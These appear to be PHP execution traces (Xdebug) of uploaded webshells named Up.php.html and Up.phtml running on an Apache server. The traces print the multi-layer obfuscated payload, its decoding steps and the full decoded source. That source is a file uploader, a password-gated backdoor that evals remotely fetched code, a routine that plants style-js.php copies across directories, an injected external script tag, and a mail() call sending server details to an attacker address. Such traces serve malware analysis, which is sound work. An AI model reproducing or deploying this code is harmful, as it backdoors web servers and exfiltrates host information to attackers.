3		A						/var/www/html/uploads/Up.php.html(5) : eval()'d code(1) : eval()'d code	40	$key = 1
4	22	0	0.001934	424912	array_search	0		/var/www/html/uploads/Up.php.html(5) : eval()'d code(1) : eval()'d code	43	2	'/var/www/html/.'	[2 => 'uploads']
4	22	1	0.001950	424984
4	22	R			FALSE
3		A						/var/www/html/uploads/Up.php.html(5) : eval()'d code(1) : eval()'d code	43	$key = FALSE
4	23	0	0.001974	424912	array_search	0		/var/www/html/uploads/Up.php.html(5) : eval()'d code(1) : eval()'d code	46	2	'/var/www/html/..'	[2 => 'uploads']
4	23	1	0.001990	424984
4	23	R			FALSE
3		A						/var/www/html/uploads/Up.php.html(5) : eval()'d code(1) : eval()'d code	46	$key = FALSE
4	24	0	0.002014	424936	array_push	0		/var/www/html/uploads/Up.php.html(5) : eval()'d code(1) : eval()'d code	49	2	[2 => 'uploads']	'/var/www/html'
4	24	1	0.002029	425000
4	24	R			2
3		A						/var/www/html/uploads/Up.php.html(5) : eval()'d code(1) : eval()'d code	51	$p = '/var/www/html/uploads'
4	25	0	0.002053	424984	is_dir	0		/var/www/html/uploads/Up.php.html(5) : eval()'d code(1) : eval()'d code	52	1	'/var/www/html/uploads'
4	25	1	0.002069	425048
4	25	R			TRUE
3		A						/var/www/html/uploads/Up.php.html(5) : eval()'d code(1) : eval()'d code	53	$file = '/var/www/html/uploads/style-js.php'
4	26	0	0.002095	425072	touch	0		/var/www/html/uploads/Up.php.html(5) : eval()'d code(1) : eval()'d code	54	1	'/var/www/html/uploads/style-js.php'
4	26	1	0.002133	425112
4	26	R			TRUE
4	27	0	0.002146	425072	fopen	0		/var/www/html/uploads/Up.php.html(5) : eval()'d code(1) : eval()'d code	55	2	'/var/www/html/uploads/style-js.php'	'w'
4	27	1	0.002177	425736
4	27	R			resource(5) of type (stream)
3		A						/var/www/html/uploads/Up.php.html(5) : eval()'d code(1) : eval()'d code	55	$folder = resource(5) of type (stream)
4	28	0	0.002205	425664	fwrite	0		/var/www/html/uploads/Up.php.html(5) : eval()'d code(1) : eval()'d code	56	2	resource(5) of type (stream)	'<?php\r\n\r\n$gz = "ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNGd6aW5mbGF0ZSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg==";\r\n$gzinflate = "=kNpMtH71+ljPksZMcCcwcK+3fDlWgk7NrBwORQ/WY/zBOoBN4X5VZLsGffsu1D7GtfN+HA/jfc4llGsPjjJ9bYdzfpXuEKc5lgWShDAjYIIyjLEB6sJ7xwmW/t3sAjUdNhc365UYm35GrrxT/tH/rnbb1CtIqbEcyy3idRJJkv+7+nmXjdVY/WLfqnB02J4O1fe/7lAU0MajUGZSsHwKqhmHzv900i0h3YtoOCJcosuAHEtpAim'
4	28	1	0.002241	425728
4	28	R			894
3		A						/var/www/html/uploads/Up.php.html(5) : eval()'d code(1) : eval()'d code	51	$p = '/var/www/html//var/www/html'
4	29	0	0.002266	425672	is_dir	0		/var/www/html/uploads/Up.php.html(5) : eval()'d code(1) : eval()'d code	52	1	'/var/www/html//var/www/html'
4	29	1	0.002283	425712
4	29	R			FALSE
3		A						/var/www/html/uploads/Up.php.html(5) : eval()'d code(1) : eval()'d code	64	$a = 'hacklinksatis@gmail.com'
3		A						/var/www/html/uploads/Up.php.html(5) : eval()'d code(1) : eval()'d code	65	$b = 'upload script'
3		A						/var/www/html/uploads/Up.php.html(5) : eval()'d code(1) : eval()'d code	66	$c = 'Dosya Yolu : /var/www/html\r\n'
3		A						/var/www/html/uploads/Up.php.html(5) : eval()'d code(1) : eval()'d code	68	$c .= 'Server Admin : webmaster@localhost\r\n'
3		A						/var/www/html/uploads/Up.php.html(5) : eval()'d code(1) : eval()'d code	70	$c .= 'Server isletim sistemi : Apache/2.4.52 (Ubuntu)\r\n'
3		A						/var/www/html/uploads/Up.php.html(5) : eval()'d code(1) : eval()'d code	72	$c .= 'Shell Link : http://localhost/uploads/Up.php.html\r\n'
3		A						/var/www/html/uploads/Up.php.html(5) : eval()'d code(1) : eval()'d code	74	$c .= 'Avlanan Site : localhost\r\n'
4	30	0	0.002388	425896	mail	0		/var/www/html/uploads/Up.php.html(5) : eval()'d code(1) : eval()'d code	76	3	'hacklinksatis@gmail.com'	'upload script'	'Dosya Yolu : /var/www/html\r\nServer Admin : webmaster@localhost\r\nServer isletim sistemi : Apache/2.4.52 (Ubuntu)\r\nShell Link : http://localhost/uploads/Up.php.html\r\nAvlanan Site : localhost\r\n'
4	30	1	0.003347	425992
4	30	R			FALSE
3	15	1	0.003376	425896
2	7	1	0.003386	407144
			0.003535	324544
TRACE END   [2023-02-12 21:39:26.798927]

data/traces/c61b501340d047ae37bf04d114d9fa20_trace-1676256714.4218.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:52:20.319622]
1	0	1	0.000160	393512
1	3	0	0.000230	396944	{main}	1		/var/www/html/uploads/Up.phtml	0	0
1		A						/var/www/html/uploads/Up.phtml	3	$gz = 'ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNGd6aW5mbGF0ZSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg=='
1		A						/var/www/html/uploads/Up.phtml	4	$gzinflate = 'O3gvY0lh+owA/d9r1rcLg9tNAnwU0iX9PyUvNOn+NuRSz7rvZzwJACPMsp6z9tlfzu+XI9i6En+VFFC/B+kumtsZQHLhsh3D6PIKaqjnDTyZnzliSw0euoDiB7gqnevZdq2V/wvbd+eH0V8IWsRhQYOmPXDi+9DRYFcPUewVJDKO9JMiFBftj7ugDILfWjy4z3UHsKUffh4FGYXXR4EYgz1Lp4AoI064w6KAa7STRnPX+uOEVwOJ2S3CDYtEAweOhcHHV+dQcihBPzBQchgZGFBRS+ygKxmlQApKCQHMmIb5mf4H+WkjLYhwsSkSK3RD1Kb0bJ+tQkV9s4FQ/0ilegHCWxXavd5JaU+ym/bqWu4XvMhlsfGJ52PG3JUdigwJtc6mI18KJHsGeeVnH2G3A7rX2FdioAa7/ocUkfFwCDAJRsAaB8hUIv5xL4DhOSs1NwxnY++85YY/H9XxLezH/T9T9b1junxxy5SKiig9yK4ravKAzGhY8VidRF5zJfmk'
2	4	0	0.000398	396944	base64_decode	0		/var/www/html/uploads/Up.phtml	5	1	'ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNGd6aW5mbGF0ZSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg=='
2	4	1	0.000421	397232
2	4	R			'eval%28%26quot%3B%3F%26gt%3B%26quot%3B.gzuncompress%28gzuncompress%28gzinflate%28gzinflate%28gzinflate%28base64_decode%28strrev%28%24gzinflate%29%29%29%29%29%29%29%29%3B'
2	5	0	0.000442	397200	urldecode	0		/var/www/html/uploads/Up.phtml	5	1	'eval%28%26quot%3B%3F%26gt%3B%26quot%3B.gzuncompress%28gzuncompress%28gzinflate%28gzinflate%28gzinflate%28base64_decode%28strrev%28%24gzinflate%29%29%29%29%29%29%29%29%3B'
2	5	1	0.000462	397456
2	5	R			'eval(&quot;?&gt;&quot;.gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($gzinflate))))))));'
2	6	0	0.000481	397168	htmlspecialchars_decode	0		/var/www/html/uploads/Up.phtml	5	1	'eval(&quot;?&gt;&quot;.gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($gzinflate))))))));'
2	6	1	0.000501	397392
2	6	R			'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($gzinflate))))))));'
2	7	0	0.000533	399520	eval	1	'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($gzinflate))))))));'	/var/www/html/uploads/Up.phtml	5	0
3	8	0	0.000549	399520	strrev	0		/var/www/html/uploads/Up.phtml(5) : eval()'d code	1	1	'O3gvY0lh+owA/d9r1rcLg9tNAnwU0iX9PyUvNOn+NuRSz7rvZzwJACPMsp6z9tlfzu+XI9i6En+VFFC/B+kumtsZQHLhsh3D6PIKaqjnDTyZnzliSw0euoDiB7gqnevZdq2V/wvbd+eH0V8IWsRhQYOmPXDi+9DRYFcPUewVJDKO9JMiFBftj7ugDILfWjy4z3UHsKUffh4FGYXXR4EYgz1Lp4AoI064w6KAa7STRnPX+uOEVwOJ2S3CDYtEAweOhcHHV+dQcihBPzBQchgZGFBRS+ygKxmlQApKCQHMmIb5mf4H+WkjLYhwsSkSK3RD1Kb0bJ+tQkV9s4FQ/0ilegHCWxXavd5JaU+ym/bqWu4XvMhlsfGJ52PG3JUdigwJtc6mI18KJHsGeeVnH2G3A7rX2FdioAa7/ocUkfFwCDAJRsAaB8hUIv5xL4DhOSs1NwxnY++85YY/H9XxLezH/T9T9b1junxxy5SKiig9yK4ravKAzGhY8VidRF5zJfmk'
3	8	1	0.000575	402112
3	8	R			'AR8G4PkBGgbl+QEVBur5eJwBCgb1+XictVb7b+I4EP59pf0fsjkkqLrXhHe7LV3CIwSWV3kUQlUhx3FIwHk0NlA47f9+dlJa2u7urXR3ERa2v5lvxuPx2FdfAzv4+AGFoR/OQxT4IXW8RUo+uWST0PaF5BV1KEbX4wD7wEThlRSPky8CEHkUhddXlu9RAfrYD0viH+m0JVtZkc+GrgAgdXyvJIqCi6jtmyUx8AkVBeRBugtQSXTXmDoBCKnE5f80AQWi4AGXQesny6LgmEej6yvpyfAPXHG8YE2FmNpyMDpwxX3i7Fk/L4sHwRicM27xSYmsDdehscl4fgPwmgFxHLh17mj059HrqyNXHCslJOb93nB0l+SqyXuhVBIOisKJ8FckU4Z+sEsl5mqzXR/eJblnyfu7JHWDOXcnef9ZeAfGwAmjEN4s2Di0n2zDuN/uKTVhOK5W68Php4PbkvESxgNH8lL4zgKKCfp9M1Y2zb5nM6rC/K79hhX2+3r98cNV'
3	9	0	0.000603	402080	base64_decode	0		/var/www/html/uploads/Up.phtml(5) : eval()'d code	1	1	'AR8G4PkBGgbl+QEVBur5eJwBCgb1+XictVb7b+I4EP59pf0fsjkkqLrXhHe7LV3CIwSWV3kUQlUhx3FIwHk0NlA47f9+dlJa2u7urXR3ERa2v5lvxuPx2FdfAzv4+AGFoR/OQxT4IXW8RUo+uWST0PaF5BV1KEbX4wD7wEThlRSPky8CEHkUhddXlu9RAfrYD0viH+m0JVtZkc+GrgAgdXyvJIqCi6jtmyUx8AkVBeRBugtQSXTXmDoBCKnE5f80AQWi4AGXQesny6LgmEej6yvpyfAPXHG8YE2FmNpyMDpwxX3i7Fk/L4sHwRicM27xSYmsDdehscl4fgPwmgFxHLh17mj059HrqyNXHCslJOb93nB0l+SqyXuhVBIOisKJ8FckU4Z+sEsl5mqzXR/eJblnyfu7JHWDOXcnef9ZeAfGwAmjEN4s2Di0n2zDuN/uKTVhOK5W68Php4PbkvESxgNH8lL4zgKKCfp9M1Y2zb5nM6rC/K79hhX2+3r98cNV'
3	9	1	0.000634	404672
3	9	R			'\001\037\006�\001\032\006�\001\025\006�x�\001\n\006��x��V�o�8\020�}��\037�9$��ׄw�-]�#\004�Wy\024BU!�qH�y46P8�~vRZ���tw\021\026���o����W_\003;��\001��\037�C\024�!u�EJ>�d����\025u(F��\000��D�\024��/\002\020y\024��W��Q\001��\017K�\037�%[Y�φ�\000 u|�$�����%1�\t\025\005�A�\vPItט:\001\b���4\001\005��\001�A�\'ˢ�G��+���\017\\q�`M���r0:p�}��Y?/�\a�\030�3n�I��\rס��x~\003�\001q\034�u�h����#W\034+%$��pt���{�T\022\016�‰�W$S�~�K%�j�]\037�%�g��$u�9w\'y�Yx\a�\t�\020�,�8��lø��)5a8�V��ᧃے�\022�\003G'
3	10	0	0.000708	402080	gzinflate	0		/var/www/html/uploads/Up.phtml(5) : eval()'d code	1	1	'\001\037\006�\001\032\006�\001\025\006�x�\001\n\006��x��V�o�8\020�}��\037�9$��ׄw�-]�#\004�Wy\024BU!�qH�y46P8�~vRZ���tw\021\026���o����W_\003;��\001��\037�C\024�!u�EJ>�d����\025u(F��\000��D�\024��/\002\020y\024��W��Q\001��\017K�\037�%[Y�φ�\000 u|�$�����%1�\t\025\005�A�\vPItט:\001\b���4\001\005��\001�A�\'ˢ�G��+���\017\\q�`M���r0:p�}��Y?/�\a�\030�3n�I��\rס��x~\003�\001q\034�u�h����#W\034+%$��pt���{�T\022\016�‰�W$S�~�K%�j�]\037�%�g��$u�9w\'y�Yx\a�\t�\020�,�8��lø��)5a8�V��ᧃے�\022�\003G'
3	10	1	0.000787	403904
3	10	R			'\001\032\006�\001\025\006�x�\001\n\006��x��V�o�8\020�}��\037�9$��ׄw�-]�#\004�Wy\024BU!�qH�y46P8�~vRZ���tw\021\026���o����W_\003;��\001��\037�C\024�!u�EJ>�d����\025u(F��\000��D�\024��/\002\020y\024��W��Q\001��\017K�\037�%[Y�φ�\000 u|�$�����%1�\t\025\005�A�\vPItט:\001\b���4\001\005��\001�A�\'ˢ�G��+���\017\\q�`M���r0:p�}��Y?/�\a�\030�3n�I��\rס��x~\003�\001q\034�u�h����#W\034+%$��pt���{�T\022\016�‰�W$S�~�K%�j�]\037�%�g��$u�9w\'y�Yx\a�\t�\020�,�8��lø��)5a8�V��ᧃے�\022�\003G�R��\002�\t�}3'
3	11	0	0.000858	401312	gzinflate	0		/var/www/html/uploads/Up.phtml(5) : eval()'d code	1	1	'\001\032\006�\001\025\006�x�\001\n\006��x��V�o�8\020�}��\037�9$��ׄw�-]�#\004�Wy\024BU!�qH�y46P8�~vRZ���tw\021\026���o����W_\003;��\001��\037�C\024�!u�EJ>�d����\025u(F��\000��D�\024��/\002\020y\024��W��Q\001��\017K�\037�%[Y�φ�\000 u|�$�����%1�\t\025\005�A�\vPItט:\001\b���4\001\005��\001�A�\'ˢ�G��+���\017\\q�`M���r0:p�}��Y?/�\a�\030�3n�I��\rס��x~\003�\001q\034�u�h����#W\034+%$��pt���{�T\022\016�‰�W$S�~�K%�j�]\037�%�g��$u�9w\'y�Yx\a�\t�\020�,�8��lø��)5a8�V��ᧃے�\022�\003G�R��\002�\t�}3'
3	11	1	0.000927	403136
3	11	R			'\001\025\006�x�\001\n\006��x��V�o�8\020�}��\037�9$��ׄw�-]�#\004�Wy\024BU!�qH�y46P8�~vRZ���tw\021\026���o����W_\003;��\001��\037�C\024�!u�EJ>�d����\025u(F��\000��D�\024��/\002\020y\024��W��Q\001��\017K�\037�%[Y�φ�\000 u|�$�����%1�\t\025\005�A�\vPItט:\001\b���4\001\005��\001�A�\'ˢ�G��+���\017\\q�`M���r0:p�}��Y?/�\a�\030�3n�I��\rס��x~\003�\001q\034�u�h����#W\034+%$��pt���{�T\022\016�‰�W$S�~�K%�j�]\037�%�g��$u�9w\'y�Yx\a�\t�\020�,�8��lø��)5a8�V��ᧃے�\022�\003G�R��\002�\t�}3V6;g3�����\0'
3	12	0	0.000997	401312	gzinflate	0		/var/www/html/uploads/Up.phtml(5) : eval()'d code	1	1	'\001\025\006�x�\001\n\006��x��V�o�8\020�}��\037�9$��ׄw�-]�#\004�Wy\024BU!�qH�y46P8�~vRZ���tw\021\026���o����W_\003;��\001��\037�C\024�!u�EJ>�d����\025u(F��\000��D�\024��/\002\020y\024��W��Q\001��\017K�\037�%[Y�φ�\000 u|�$�����%1�\t\025\005�A�\vPItט:\001\b���4\001\005��\001�A�\'ˢ�G��+���\017\\q�`M���r0:p�}��Y?/�\a�\030�3n�I��\rס��x~\003�\001q\034�u�h����#W\034+%$��pt���{�T\022\016�‰�W$S�~�K%�j�]\037�%�g��$u�9w\'y�Yx\a�\t�\020�,�8��lø��)5a8�V��ᧃے�\022�\003G�R��\002�\t�}3V6;g3�����\0'
3	12	1	0.001064	403136
3	12	R			'x�\001\n\006��x��V�o�8\020�}��\037�9$��ׄw�-]�#\004�Wy\024BU!�qH�y46P8�~vRZ���tw\021\026���o����W_\003;��\001��\037�C\024�!u�EJ>�d����\025u(F��\000��D�\024��/\002\020y\024��W��Q\001��\017K�\037�%[Y�φ�\000 u|�$�����%1�\t\025\005�A�\vPItט:\001\b���4\001\005��\001�A�\'ˢ�G��+���\017\\q�`M���r0:p�}��Y?/�\a�\030�3n�I��\rס��x~\003�\001q\034�u�h����#W\034+%$��pt���{�T\022\016�‰�W$S�~�K%�j�]\037�%�g��$u�9w\'y�Yx\a�\t�\020�,�8��lø��)5a8�V��ᧃے�\022�\003G�R��\002�\t�}3V6;g3�����\025��z���U��e�\'
3	13	0	0.001139	401312	gzuncompress	0		/var/www/html/uploads/Up.phtml(5) : eval()'d code	1	1	'x�\001\n\006��x��V�o�8\020�}��\037�9$��ׄw�-]�#\004�Wy\024BU!�qH�y46P8�~vRZ���tw\021\026���o����W_\003;��\001��\037�C\024�!u�EJ>�d����\025u(F��\000��D�\024��/\002\020y\024��W��Q\001��\017K�\037�%[Y�φ�\000 u|�$�����%1�\t\025\005�A�\vPItט:\001\b���4\001\005��\001�A�\'ˢ�G��+���\017\\q�`M���r0:p�}��Y?/�\a�\030�3n�I��\rס��x~\003�\001q\034�u�h����#W\034+%$��pt���{�T\022\016�‰�W$S�~�K%�j�]\037�%�g��$u�9w\'y�Yx\a�\t�\020�,�8��lø��)5a8�V��ᧃے�\022�\003G�R��\002�\t�}3V6;g3�����\025��z���U��e�\'
3	13	1	0.001206	403136
3	13	R			'x��V�o�8\020�}��\037�9$��ׄw�-]�#\004�Wy\024BU!�qH�y46P8�~vRZ���tw\021\026���o����W_\003;��\001��\037�C\024�!u�EJ>�d����\025u(F��\000��D�\024��/\002\020y\024��W��Q\001��\017K�\037�%[Y�φ�\000 u|�$�����%1�\t\025\005�A�\vPItט:\001\b���4\001\005��\001�A�\'ˢ�G��+���\017\\q�`M���r0:p�}��Y?/�\a�\030�3n�I��\rס��x~\003�\001q\034�u�h����#W\034+%$��pt���{�T\022\016�‰�W$S�~�K%�j�]\037�%�g��$u�9w\'y�Yx\a�\t�\020�,�8��lø��)5a8�V��ᧃے�\022�\003G�R��\002�\t�}3V6;g3�����\025��z���U��e�\bay2\'�eB��`��'
3	14	0	0.001274	401312	gzuncompress	0		/var/www/html/uploads/Up.phtml(5) : eval()'d code	1	1	'x��V�o�8\020�}��\037�9$��ׄw�-]�#\004�Wy\024BU!�qH�y46P8�~vRZ���tw\021\026���o����W_\003;��\001��\037�C\024�!u�EJ>�d����\025u(F��\000��D�\024��/\002\020y\024��W��Q\001��\017K�\037�%[Y�φ�\000 u|�$�����%1�\t\025\005�A�\vPItט:\001\b���4\001\005��\001�A�\'ˢ�G��+���\017\\q�`M���r0:p�}��Y?/�\a�\030�3n�I��\rס��x~\003�\001q\034�u�h����#W\034+%$��pt���{�T\022\016�‰�W$S�~�K%�j�]\037�%�g��$u�9w\'y�Yx\a�\t�\020�,�8��lø��)5a8�V��ᧃے�\022�\003G�R��\002�\t�}3V6;g3�����\025��z���U��e�\bay2\'�eB��`��'
3	14	1	0.001366	405440
3	14	R			'<?php\r\nerror_reporting(0);\r\necho \'<title>Uploader</title>\';\r\necho \'<center><font color="#11f0f3"><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader"></center>\';\r\necho \'<center><input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form></font><center>\';\r\nif( $_POST[\'_upl\'] == "Upload" ) {\r\nif(@copy($_FILES[\'file\'][\'tmp_name\'], $_FILES[\'file\'][\'name\'])) { echo \'<center><br><br><b><font color="#11f'
3	15	0	0.001497	423640	eval	1	'?><?php\r\nerror_reporting(0);\r\necho \'<title>Uploader</title>\';\r\necho \'<center><font color="#11f0f3"><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader"></center>\';\r\necho \'<center><input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form></font><center>\';\r\nif( $_POST[\'_upl\'] == "Upload" ) {\r\nif(@copy($_FILES[\'file\'][\'tmp_name\'], $_FILES[\'file\'][\'name\'])) { echo \'<center><br><br><b><font color="#11f0f3">UPLOAD SUCCESS!</font></b></center><br><br>\'; }\r\nelse { echo \'<center><br><br><b><font color="#f31111">UPLOAD FAILED!</font></b></center><br><br>\'; }\r\n}\r\n?>\r\n<?php\r\n@session_start();\r\n@error_reporting(0);\r\n$a = \'<?php\r\n\r\n$gz = "ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNGd6aW5mbGF0ZSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg==";\r\n$gzinflate = "=kNpMtH71+ljPksZMcCcwcK+3fDlWgk7NrBwORQ/WY/zBOoBN4X5VZLsGffsu1D7GtfN+HA/jfc4llGsPjjJ9bYdzfpXuEKc5lgWShDAjYIIyjLEB6sJ7xwmW/t3sAjUdNhc365UYm35GrrxT/tH/rnbb1CtIqbEcyy3idRJJkv+7+nmXjdVY/WLfqnB02J4O1fe/7lAU0MajUGZSsHwKqhmHzv900i0h3YtoOCJcosuAHEtpAimJmdmoFCB2NZlgqVobRLXemwlekB8PSBazZLFbIHPfRsqapn5Z2WFCGLcWb5Ls9hJahXA7YV+RHfRiYvgTQpUFHyk8tcxG2ovhQOTquhQ66yaMV9H6FEhemC6vu7woIlYFCFlmOADdmcnyI39588cbGYIw42qSs//TI4HhYD0z0ItUW6T0Zs4GozL1SjnL3tNWA5gc9D9v0HFwI8adFVbcin/sGwUBwJe+HaAeFg/cGwYB4/lBgWA";\r\neval(htmlspecialchars_decode(urldecode(base64_decode($gz))));\r\n\r\n?>\r\n<form action="" method="post">\r\n<input type="text" name="p">\r\n</form>\r\n\';\r\nif (@$_REQUEST["px"]) {\r\n    $p = @$_REQUEST["px"];\r\n    $pa = md5(sha1($p));\r\n    if ($pa == "7e2cb042f3fd80e5a826735222585fde") {\r\n        echo eval(@file_get_contents(@$_REQUEST["404"]));\r\n    }\r\n}\r\nif (@!$_SESSION["sdm"]) {\r\n    $doc = $_SERVER["DOCUMENT_ROOT"];\r\n    $dir = scandir($doc);\r\n    $d1 = \'\' . $doc . \'/.\';\r\n    $d2 = \'\' . $doc . \'/..\';\r\n    if (($key = @array_search(\'.\', $dir)) !== false) {\r\n        unset($dir[$key]);\r\n    }\r\n    if (($key = @array_search(\'..\', $dir)) !== false) {\r\n        unset($dir[$key]);\r\n    }\r\n    if (($key = @array_search($d1, $dir)) !== false) {\r\n        unset($dir[$key]);\r\n    }\r\n    if (($key = array_search($d2, $dir)) !== false) {\r\n        unset($dir[$key]);\r\n    }\r\n    @array_push($dir, $doc);\r\n    foreach ($dir as $d) {\r\n        $p = $doc . "/" . $d;\r\n        if (is_dir($p)) {\r\n            $file = $p . "/style-js.php";\r\n            @touch($file);\r\n            $folder = @fopen($file, "w");\r\n            @fwrite($folder, $a);\r\n        }\r\n    }\r\n   \r\n}\r\n?>\r\n<script src=http://teledramasinhala.com/img/icons/image.js></script>\r\n<?php\r\n$a = "hacklinksatis@gmail.com";\r\n$b = "upload script";\r\n$c = "Dosya Yolu : " . $_SERVER[\'DOCUMENT_ROOT\'] . "\r\n";\r\n$c.= "Server Admin : " . $_SERVER[\'SERVER_ADMIN\'] . "\r\n";\r\n$c.= "Server isletim sistemi : " . $_SERVER[\'SERVER_SOFTWARE\'] . "\r\n";\r\n$c.= "Shell Link : http://" . $_SERVER[\'SERVER_NAME\'] . $_SERVER[\'PHP_SELF\'] . "\r\n";\r\n$c.= "Avlanan Site : " . $_SERVER[\'HTTP_HOST\'] . "\r\n";\r\nmail($a, $b, $c);\r\n?>'	/var/www/html/uploads/Up.phtml(5) : eval()'d code	1	0
4	16	0	0.001580	423640	error_reporting	0		/var/www/html/uploads/Up.phtml(5) : eval()'d code(1) : eval()'d code	2	1	0
4	16	1	0.001596	423680
4	16	R			22527
4	17	0	0.001614	423640	session_start	0		/var/www/html/uploads/Up.phtml(5) : eval()'d code(1) : eval()'d code	12	0
4	17	1	0.001672	424392
4	17	R			TRUE
4	18	0	0.001688	424392	error_reporting	0		/var/www/html/uploads/Up.phtml(5) : eval()'d code(1) : eval()'d code	13	1	0
4	18	1	0.001704	424432
4	18	R			0
3		A						/var/www/html/uploads/Up.phtml(5) : eval()'d code(1) : eval()'d code	14	$a = '<?php\r\n\r\n$gz = "ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNGd6aW5mbGF0ZSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg==";\r\n$gzinflate = "=kNpMtH71+ljPksZMcCcwcK+3fDlWgk7NrBwORQ/WY/zBOoBN4X5VZLsGffsu1D7GtfN+HA/jfc4llGsPjjJ9bYdzfpXuEKc5lgWShDAjYIIyjLEB6sJ7xwmW/t3sAjUdNhc365UYm35GrrxT/tH/rnbb1CtIqbEcyy3idRJJkv+7+nmXjdVY/WLfqnB02J4O1fe/7lAU0MajUGZSsHwKqhmHzv900i0h3YtoOCJcosuAHEtpAim'
3		A						/var/www/html/uploads/Up.phtml(5) : eval()'d code(1) : eval()'d code	33	$doc = '/var/www/html'
4	19	0	0.001759	424392	scandir	0		/var/www/html/uploads/Up.phtml(5) : eval()'d code(1) : eval()'d code	34	1	'/var/www/html'
4	19	1	0.001789	424896
4	19	R			[0 => '.', 1 => '..', 2 => 'uploads']
3		A						/var/www/html/uploads/Up.phtml(5) : eval()'d code(1) : eval()'d code	34	$dir = [0 => '.', 1 => '..', 2 => 'uploads']
3		A						/var/www/html/uploads/Up.phtml(5) : eval()'d code(1) : eval()'d code	35	$d1 = '/var/www/html/.'
3		A						/var/www/html/uploads/Up.phtml(5) : eval()'d code(1) : eval()'d code	36	$d2 = '/var/www/html/..'
4	20	0	0.001846	424952	array_search	0		/var/www/html/uploads/Up.phtml(5) : eval()'d code(1) : eval()'d code	37	2	'.'	[0 => '.', 1 => '..', 2 => 'uploads']
4	20	1	0.001863	425024
4	20	R			0
3		A						/var/www/html/uploads/Up.phtml(5) : eval()'d code(1) : eval()'d code	37	$key = 0
4	21	0	0.001889	424920	array_search	0		/var/www/html/uploads/Up.phtml(5) : eval()'d code(1) : eval()'d code	40	2	'..'	[1 => '..', 2 => 'uploads']
4	21	1	0.001909	424992
4	21	R			1
3		A						/var/www/html/uploads/Up.phtml(5) : eval()'d code(1) : eval()'d code	40	$key = 1
4	22	0	0.001934	424888	array_search	0		/var/www/html/uploads/Up.phtml(5) : eval()'d code(1) : eval()'d code	43	2	'/var/www/html/.'	[2 => 'uploads']
4	22	1	0.001949	424960
4	22	R			FALSE
3		A						/var/www/html/uploads/Up.phtml(5) : eval()'d code(1) : eval()'d code	43	$key = FALSE
4	23	0	0.001973	424888	array_search	0		/var/www/html/uploads/Up.phtml(5) : eval()'d code(1) : eval()'d code	46	2	'/var/www/html/..'	[2 => 'uploads']
4	23	1	0.001988	424960
4	23	R			FALSE
3		A						/var/www/html/uploads/Up.phtml(5) : eval()'d code(1) : eval()'d code	46	$key = FALSE
4	24	0	0.002012	424912	array_push	0		/var/www/html/uploads/Up.phtml(5) : eval()'d code(1) : eval()'d code	49	2	[2 => 'uploads']	'/var/www/html'
4	24	1	0.002027	424976
4	24	R			2
3		A						/var/www/html/uploads/Up.phtml(5) : eval()'d code(1) : eval()'d code	51	$p = '/var/www/html/uploads'
4	25	0	0.002051	424960	is_dir	0		/var/www/html/uploads/Up.phtml(5) : eval()'d code(1) : eval()'d code	52	1	'/var/www/html/uploads'
4	25	1	0.002069	425024
4	25	R			TRUE
3		A						/var/www/html/uploads/Up.phtml(5) : eval()'d code(1) : eval()'d code	53	$file = '/var/www/html/uploads/style-js.php'
4	26	0	0.002095	425048	touch	0		/var/www/html/uploads/Up.phtml(5) : eval()'d code(1) : eval()'d code	54	1	'/var/www/html/uploads/style-js.php'
4	26	1	0.002131	425088
4	26	R			TRUE
4	27	0	0.002146	425048	fopen	0		/var/www/html/uploads/Up.phtml(5) : eval()'d code(1) : eval()'d code	55	2	'/var/www/html/uploads/style-js.php'	'w'
4	27	1	0.002176	425712
4	27	R			resource(5) of type (stream)
3		A						/var/www/html/uploads/Up.phtml(5) : eval()'d code(1) : eval()'d code	55	$folder = resource(5) of type (stream)
